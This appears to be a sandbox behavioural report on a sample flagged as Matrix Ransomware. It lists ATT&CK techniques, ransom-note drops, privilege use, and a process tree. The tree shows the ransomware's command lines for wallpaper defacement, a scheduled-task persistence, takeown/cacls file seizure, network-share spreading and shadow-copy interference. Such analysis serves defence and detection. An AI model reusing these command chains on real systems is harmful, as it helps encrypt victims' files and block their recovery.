File opened (read-only)	\??\M:	YDR1ohI764.exe
File opened (read-only)	\??\T:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\V:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\A:	YDR1ohI764.exe
File opened (read-only)	\??\B:	YDR1ohI764.exe
File opened (read-only)	\??\K:	YDR1ohI764.exe
File opened (read-only)	\??\R:	YDR1ohI764.exe
File opened (read-only)	\??\U:	YDR1ohI764.exe
File opened (read-only)	\??\Z:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\M:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\I:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened (read-only)	\??\F:	YDR1ohI764.exe
File opened (read-only)	\??\G:	YDR1ohI764.exe
File opened (read-only)	\??\T:	YDR1ohI764.exe
File opened (read-only)	\??\Y:	YDR1ohI764.exe
File opened (read-only)	\??\X:	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\gT9QtFMt.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\hu.pak	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\sv-se\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\tr-tr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\id_get.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\uk-ua\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_zh_4.4.0.v20140623020002.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-openide-nodes_ja.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\sd\jamendo.luac	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\S_IlluDCFilesEmpty_180x180.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\js\nls\ca-es\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\fonts\LucidaSansDemiBold.ttf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\Annotations\Stamps\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-cn\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\images\cursors\invalid32x32.gif	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\nb-no\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.di.nl_ja_4.4.0.v20140623020002.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.w3c.dom.smil_1.0.0.v200806040011.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check.cur	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ro-ro\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\cs-cz\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\bg\LC_MESSAGES\vlc.mo	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\lua\http\dialogs\create_stream.html	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\themes\dark\check.cur	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-host-views.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_invite_24.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\es-es\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\nb-no\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\jre\lib\security\java.policy	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4-dark_mac.css	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\cmm\PYCC.pf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\hu-hu\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\js\nls\pt-br\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.core.di_1.4.0.v20140414-1837.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\js\selector.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\ja-jp\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\security\blacklisted.certs	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Windows Mail\en-US\WinMail.exe.mui	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\bin\jhat.exe	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jre1.8.0_66\lib\accessibility.properties	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_listview_selected-hover.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\clearkey.dll.sig	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\es-es\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\nb-no\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\export.svg	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\css\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\adobe_spinner.gif	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\hr-hr\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\example_icons.png	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins3d\prcr.x3d	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\root\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\en-il\JDPR_README.rtf	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\ECLIPSE_.RSA	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\86.0.4240.111\Locales\he.pak	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\hi_contrast\aic_file_icons_hiContrast_wob.png	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\generic-rhp-app\images\rhp_world_icon_2x.png	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hu-hu\ui-strings.js	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\EScript.api	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\AddressBook.png	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.forms.nl_zh_4.4.0.v20140623020002.jar	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
4748	schtasks.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
4292	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe
4960	YDR1ohI764.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
4960	YDR1ohI764.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4960	YDR1ohI764.exe
Token: SeLoadDriverPrivilege	4960	YDR1ohI764.exe
Token: SeTakeOwnershipPrivilege	4640	takeown.exe
Token: SeTakeOwnershipPrivilege	4752	takeown.exe
Token: SeTakeOwnershipPrivilege	4912	takeown.exe
Token: SeTakeOwnershipPrivilege	5084	takeown.exe
Token: SeBackupPrivilege	4580	vssvc.exe
Token: SeRestorePrivilege	4580	vssvc.exe
Token: SeAuditPrivilege	4580	vssvc.exe
Token: SeTakeOwnershipPrivilege	4716	takeown.exe
Token: SeTakeOwnershipPrivilege	1528	takeown.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeSecurityPrivilege	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	1612	WMIC.exe
Token: SeLoadDriverPrivilege	1612	WMIC.exe
Token: SeSystemProfilePrivilege	1612	WMIC.exe
Token: SeSystemtimePrivilege	1612	WMIC.exe
Token: SeProfSingleProcessPrivilege	1612	WMIC.exe
Token: SeIncBasePriorityPrivilege	1612	WMIC.exe
Token: SeCreatePagefilePrivilege	1612	WMIC.exe
Token: SeBackupPrivilege	1612	WMIC.exe
Token: SeRestorePrivilege	1612	WMIC.exe
Token: SeShutdownPrivilege	1612	WMIC.exe
Token: SeDebugPrivilege	1612	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1612	WMIC.exe
Token: SeRemoteShutdownPrivilege	1612	WMIC.exe
Token: SeUndockPrivilege	1612	WMIC.exe
Token: SeManageVolumePrivilege	1612	WMIC.exe
Token: 33	1612	WMIC.exe
Token: 34	1612	WMIC.exe
Token: 35	1612	WMIC.exe
Token: 36	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	5032	takeown.exe
Token: SeIncreaseQuotaPrivilege	1612	WMIC.exe
Token: SeSecurityPrivilege	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	1612	WMIC.exe
Token: SeLoadDriverPrivilege	1612	WMIC.exe
Token: SeSystemProfilePrivilege	1612	WMIC.exe
Token: SeSystemtimePrivilege	1612	WMIC.exe
Token: SeProfSingleProcessPrivilege	1612	WMIC.exe
Token: SeIncBasePriorityPrivilege	1612	WMIC.exe
Token: SeCreatePagefilePrivilege	1612	WMIC.exe
Token: SeBackupPrivilege	1612	WMIC.exe
Token: SeRestorePrivilege	1612	WMIC.exe
Token: SeShutdownPrivilege	1612	WMIC.exe
Token: SeDebugPrivilege	1612	WMIC.exe
Token: SeSystemEnvironmentPrivilege	1612	WMIC.exe
Token: SeRemoteShutdownPrivilege	1612	WMIC.exe
Token: SeUndockPrivilege	1612	WMIC.exe
Token: SeManageVolumePrivilege	1612	WMIC.exe
Token: 33	1612	WMIC.exe
Token: 34	1612	WMIC.exe
Token: 35	1612	WMIC.exe
Token: 36	1612	WMIC.exe
Token: SeTakeOwnershipPrivilege	288	takeown.exe
Token: SeTakeOwnershipPrivilege	4860	takeown.exe
Token: SeTakeOwnershipPrivilege	4400	takeown.exe
Token: SeTakeOwnershipPrivilege	5056	takeown.exe
Token: SeTakeOwnershipPrivilege	4880	takeown.exe
Token: SeTakeOwnershipPrivilege	4180	takeown.exe
Token: SeTakeOwnershipPrivilege	2240	takeown.exe
Token: SeTakeOwnershipPrivilege	4812	takeown.exe
Token: SeTakeOwnershipPrivilege	4444	takeown.exe
Token: SeTakeOwnershipPrivilege	284	takeown.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 988 wrote to memory of 3940	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	73
PID 988 wrote to memory of 3940	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	73
PID 988 wrote to memory of 3940	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	73
PID 988 wrote to memory of 2880	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	76
PID 988 wrote to memory of 2880	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	76
PID 988 wrote to memory of 2880	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	76
PID 988 wrote to memory of 4348	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	83
PID 988 wrote to memory of 4348	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	83
PID 988 wrote to memory of 4348	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	83
PID 988 wrote to memory of 4360	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	85
PID 988 wrote to memory of 4360	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	85
PID 988 wrote to memory of 4360	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	85
PID 4360 wrote to memory of 4452	4360	cmd.exe	87
PID 4360 wrote to memory of 4452	4360	cmd.exe	87
PID 4360 wrote to memory of 4452	4360	cmd.exe	87
PID 4348 wrote to memory of 4480	4348	cmd.exe	88
PID 4348 wrote to memory of 4480	4348	cmd.exe	88
PID 4348 wrote to memory of 4480	4348	cmd.exe	88
PID 988 wrote to memory of 4564	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	89
PID 988 wrote to memory of 4564	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	89
PID 988 wrote to memory of 4564	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	89
PID 4348 wrote to memory of 4576	4348	cmd.exe	91
PID 4348 wrote to memory of 4576	4348	cmd.exe	91
PID 4348 wrote to memory of 4576	4348	cmd.exe	91
PID 4452 wrote to memory of 4632	4452	wscript.exe	92
PID 4452 wrote to memory of 4632	4452	wscript.exe	92
PID 4452 wrote to memory of 4632	4452	wscript.exe	92
PID 4348 wrote to memory of 4680	4348	cmd.exe	94
PID 4348 wrote to memory of 4680	4348	cmd.exe	94
PID 4348 wrote to memory of 4680	4348	cmd.exe	94
PID 4632 wrote to memory of 4748	4632	cmd.exe	96
PID 4632 wrote to memory of 4748	4632	cmd.exe	96
PID 4632 wrote to memory of 4748	4632	cmd.exe	96
PID 4564 wrote to memory of 4768	4564	cmd.exe	97
PID 4564 wrote to memory of 4768	4564	cmd.exe	97
PID 4564 wrote to memory of 4768	4564	cmd.exe	97
PID 4564 wrote to memory of 4792	4564	cmd.exe	98
PID 4564 wrote to memory of 4792	4564	cmd.exe	98
PID 4564 wrote to memory of 4792	4564	cmd.exe	98
PID 4452 wrote to memory of 4820	4452	wscript.exe	99
PID 4452 wrote to memory of 4820	4452	wscript.exe	99
PID 4452 wrote to memory of 4820	4452	wscript.exe	99
PID 4820 wrote to memory of 4876	4820	cmd.exe	101
PID 4820 wrote to memory of 4876	4820	cmd.exe	101
PID 4820 wrote to memory of 4876	4820	cmd.exe	101
PID 4564 wrote to memory of 4900	4564	cmd.exe	102
PID 4564 wrote to memory of 4900	4564	cmd.exe	102
PID 4564 wrote to memory of 4900	4564	cmd.exe	102
PID 4900 wrote to memory of 4920	4900	cmd.exe	103
PID 4900 wrote to memory of 4920	4900	cmd.exe	103
PID 4900 wrote to memory of 4920	4900	cmd.exe	103
PID 4920 wrote to memory of 4960	4920	YDR1ohI7.exe	105
PID 4920 wrote to memory of 4960	4920	YDR1ohI7.exe	105
PID 988 wrote to memory of 5000	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	106
PID 988 wrote to memory of 5000	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	106
PID 988 wrote to memory of 5000	988	224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe	106
PID 5000 wrote to memory of 5080	5000	cmd.exe	109
PID 5000 wrote to memory of 5080	5000	cmd.exe	109
PID 5000 wrote to memory of 5080	5000	cmd.exe	109
PID 5000 wrote to memory of 5100	5000	cmd.exe	110
PID 5000 wrote to memory of 5100	5000	cmd.exe	110
PID 5000 wrote to memory of 5100	5000	cmd.exe	110
PID 5000 wrote to memory of 2408	5000	cmd.exe	111
PID 5000 wrote to memory of 2408	5000	cmd.exe	111

C:\Users\Admin\AppData\Local\Temp\224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe
"C:\Users\Admin\AppData\Local\Temp\224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe"
1⤵
- Matrix Ransomware
- Modifies extensions of user files
- Drops desktop.ini file(s)
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:988
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\224ce0605b6840d7953729cee972f9e79198cb0d45a2cd3f16198444f6d2f914.exe" "C:\Users\Admin\AppData\Local\Temp\NWIILmaM.exe"
  2⤵
  PID:3940
- C:\Users\Admin\AppData\Local\Temp\NWIILmaM.exe
  "C:\Users\Admin\AppData\Local\Temp\NWIILmaM.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2880
- - C:\Users\Admin\AppData\Local\Temp\NWIILmaM.exe
    "C:\Users\Admin\AppData\Local\Temp\NWIILmaM.exe" "\\10.10.0.87\C$"
    3⤵
    PID:5624
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\gT9QtFMt.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4348
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\gT9QtFMt.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:4480
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:4680
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\F9Z9WO5a.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4360
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\F9Z9WO5a.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4452
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\RpTkryrQ.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4632
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\RpTkryrQ.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:4748
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4820
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:4876
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\73cX6Gd5.bat" "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4564
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa" /E /G Admin:F /C
    3⤵
    PID:4768
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Java\jdk1.8.0_66\jre\bin\server\classes.jsa"
    3⤵
    - Modifies file permissions
    PID:4792
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c YDR1ohI7.exe -accepteula "classes.jsa" -nobanner
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4900
  - - C:\Users\Admin\AppData\Local\Temp\YDR1ohI7.exe
